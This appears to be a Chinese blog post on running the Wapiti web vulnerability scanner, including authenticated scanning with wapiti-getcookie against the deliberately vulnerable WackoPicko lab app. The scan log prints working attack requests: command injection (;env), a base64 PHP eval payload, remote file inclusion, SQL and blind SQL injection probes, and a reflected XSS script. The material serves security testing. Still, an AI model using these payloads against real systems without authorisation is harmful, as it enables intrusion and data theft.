Wapiti web扫描工具使用——支持ssl，看官方示例报告就知道如何支持带cookie和用户名密码的扫描了

Wapiti 是一个基于命令行单Web漏洞扫描器，通过给目标站点发送 GET 和 POST 请求查找如下漏洞： (http://wapiti.sourceforge.net/):

• File disclosure
• 数据库注入
• XSS (跨站脚本)
• Command execution detection
• CRLF injection
• XXE (XML eXternal Entity) injection
• Use of known potentially dangerous files
• Weak .htaccess configurations that can be bypassed
• 包含敏感信息的备份文件 (source code disclosure)

这篇文字，讨论如何利用 Wapiti 进行测试应用漏洞单发现和扫描报告的生成

实践

1. 命令行调用 Wapiti：

作者：半个王国
链接：https://www.jianshu.com/p/d550d7b820a9

上述方式有问题，最新版命令已经改变：

Usage: wapiti [options]

可选参数:
  -h, --help 显示此帮助消息并退出 -u URL, --url URL 定义扫描范围的基础URL 默认扫描范围是folder --scope {page, folder, domain, url, punk} 设置扫描范围 -m MODULES_LIST, --module MODULES_LIST 加载模块列表 --list-modules 列出Wapiti攻击模块并退出 -l LEVEL, --level LEVEL 设置攻击等级  -p PROXY_URL, --proxy PROXY_URL 设置HTTP(S)代理 支持HTTP(S), SOCKS --tor 使用Tor监听器 (127.0.0.1:9050)  -a CREDENTIALS, --auth-cred CREDENTIALS 设置HTTP认证凭据 --auth-type {basic, digest, kerberos, ntlm} 设置认证类型 -c COOKIE_FILE, --cookie COOKIE_FILE 设置json格式的Cookie文件 --skip-crawl 不恢复之前会话记录的扫描进程 --resume-crawl 即使先前曾进行过某些已停止的攻击也可以恢复扫描进程 --flush-attacks 放弃当前会话的攻击历史和漏洞信息 --flush-session 放弃所有之前发现的当前目标的所有信息包括爬取的URL和漏洞等 --store-session PATH 存储攻击历史记录和会话数据的目录 -s URL, --start URL 添加起始扫描URL -x URL, --exclude URL 添加要排除的URL -r PARAMETER, --remove PARAMETER 删除URL中的给定的参数 --skip PARAMETER 不攻击给定的参数 -d DEPTH, --depth DEPTH 设置扫描深度 --max-links-per-page MAX 设置扫描范围内每一页面提取的链接数 --max-files-per-dir MAX 设置每一目录探索的页面数 --max-scan-time MINUTES 设置扫描持续时间float分钟数 --max-parameters MAX 拥有超过最大输入参数的URL和表单在攻击前会被删除 -S FORCE, --scan-force FORCE 减少扫描和攻击的URL的简单办法 可选值: paranoid, sneaky, polite, normal, aggressive, insane -t SECONDS, --timeout SECONDS 设置请求超时时间 -H HEADER, --header HEADER 设置每次请求的首部 -A AGENT, --user-agent AGENT 设置每次请求的User-Agent --verify-ssl {0, 1} 是否检查SSL 默认不检查 --color 使用颜色美化输出 -v LEVEL, --verbose LEVEL 设置详细度 (0: quiet, 1: normal, 2: verbose) -f FORMAT, --format FORMAT 设置输出格式 支持: json, html(default), txt, openvas, vulneranet, xml -o OUPUT_PATH, --output OUPUT_PATH 输出文件或目录 --external-endpoint EXTERNAL_ENDPOINT_URL Url serving as endpoint for target --internal-endpoint INTERNAL_ENDPOINT_URL Url serving as endpoint for attacker --endpoint ENDPOINT_URL Url serving as endpoint for both attacker and target --no-bugreport 当攻击模块失败时不发送Bug报告 --version 打印程序版本号

What's new in Wapiti 3.0.3 ? Take a look here.

Wapiti can detect the following vulnerabilities :

• File disclosure (Local and remote include/require, fopen, readfile...)
• Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
• XSS (Cross Site Scripting) injection (reflected and permanent)
• Command Execution detection (eval(), system(), passtru()...)
• CRLF Injection (HTTP Response Splitting, session fixation...)
• XXE (XML External Entity) injection
• SSRF (Server Side Request Forgery)
• Use of know potentially dangerous files (thanks to the Nikto database)
• Weak .htaccess configurations that can be bypassed
• Presence of backup files giving sensitive information (source code disclosure)
• Shellshock (aka Bash bug)
• Open Redirects
• Uncommon HTTP methods that can be allowed (PUT)

 

General features

• Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...).
• Can suspend and resume a scan or an attack (session mechanism using sqlite3 databases).
• Can give you colors in the terminal to highlight vulnerabilities.
• Different levels of verbosity.
• Fast and easy way to activate/deactivate attack modules.
• Adding a payload can be as easy as adding a line to a text file.

Browsing features

• Support HTTP, HTTPS and SOCKS5 proxies.
• Authentication on the target via several methods : Basic, Digest, Kerberos or NTLM.
• Ability to restrain the scope of the scan (domain, folder, page, url).
• Automatic removal of one or more parameters in URLs.
• Multiple safeguards against scan endless-loops (for example, limit of values for a parameter).
• Possibility to set the first URLs to explore (even if not in scope).
• Can exclude some URLs of the scan and attacks (eg: logout URL).
• Import of cookies (get them with the wapiti-getcookie tool).
• Can activate / deactivate SSL certificates verification.
• Extract URLs from Flash SWF files.
• Try to extract URLs from javascript (very basic JS interpreter).
• HTML5 aware (understand recent HTML tags).
• Several options to control the crawler behavior and limits.
• Skipping some parameter names during attack.
• Setting a maximum time for the scan process.
• Adding some custom HTTP headers or setting a custom User-Agent.

 

看官方的示例报告就知道是如何支持cookie和用户名、密码的扫描了：

 

Hello,

Here is a really fast tutorial on Wapiti and Wapiti-getcookie usage to show how to login to a website to retrieve cookies
then use the generated cookie file to launch a Wapiti scan.

First, I use wapiti-getcookie to login in the restricted area and get the cookie in cookies.json :

bash-4.2$ wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

Choose the form you want to use or enter 'q' to leave :
0) GET http://wackopicko/pictures/search.php?query=&x=1&y=1 (0)
1) POST http://wackopicko/users/login.php (0)
        data: username=&password=

Enter a number : 1

Please enter values for the following form:
url = http://wackopicko/users/login.php
username: wanda
password: wanda
<Cookie PHPSESSID=aofe1utktsh6q4blip8nr9820lksehjf0tr3019vm6bq8v1ca6d1 for wackopicko/>

It can also be done with wapiti-getcookie this way (if you have all necessary informations about the form) :
wapiti-getcookie -u http://wackopicko/users/login.php -c cookies.json -d "username=wanda&password=wanda"

Then, I scan the vulnerable website using the cookie and excluding the logout script :

bash-4.2$ wapiti -u http://wackopicko/ -x http://wackopicko/users/logout.php -c cookies.json
    __      __               .__  __  .__________
   /  \    /  \_____  ______ |__|/  |_|__\_____  \ 
   \   \/\/   /\__  \ \____ \|  \   __\  | _(__  <
    \        /  / __ \|  |_> >  ||  | |  |/       \ 
     \__/\  /  (____  /   __/|__||__| |__/______  /
          \/        \/|__|                      \/

Wapiti-3.0.0 (wapiti.sourceforge.net)
[*] Saving scan state, please wait...

 Note
========
This scan has been saved in the file /home/devloop/.wapiti/scans/wackopicko_folder_30e1d821.db
[*] Wapiti found 41 URLs and forms during the scan
[*] Loading modules:
         mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto, mod_delay, mod_buster, mod_shellshock

[*] Launching module exec
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%3Benv HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---
---
PHP evaluation in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=data%3A%3Bbase64%2CPD9waHAgZWNobyAndzRwMXQxJywnX2V2YWwnOyA%2FPg%3D%3D HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module file
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
---
---
Remote inclusion vulnerability in http://wackopicko/admin/index.php via injection in the parameter page
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module sql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=%C2%BF%27%22%28 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module xss
---
XSS vulnerability in http://wackopicko/pictures/search.php via injection in the parameter query
Evil request:
    GET /users/WackoPicko/website/pictures/search.php?query=%22%2F%3E%3Cscript%3Ealert%28%27wj6bncic12%27%29%3C%2Fscript%3E&x=1&y=1 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/
---

[*] Launching module blindsql
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    GET /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
---
---
Received a HTTP 500 error in http://wackopicko/admin/index.php
Evil request:
    POST /users/WackoPicko/website/admin/index.php?page=sleep%287%29%231 HTTP/1.1
    Host: wackopicko
    Referer: http://wackopicko/admin/index.php?page=login
    Content-Type: application/x-www-form-urlencoded

    adminname=default&password=letmein
---

[*] Launching module permanentxss

Report
------
A report has been generated in the file /home/devloop/.wapiti/generated_report
Open /home/devloop/.wapiti/generated_report/wackopicko_12292017_1342.html with a browser to see this report.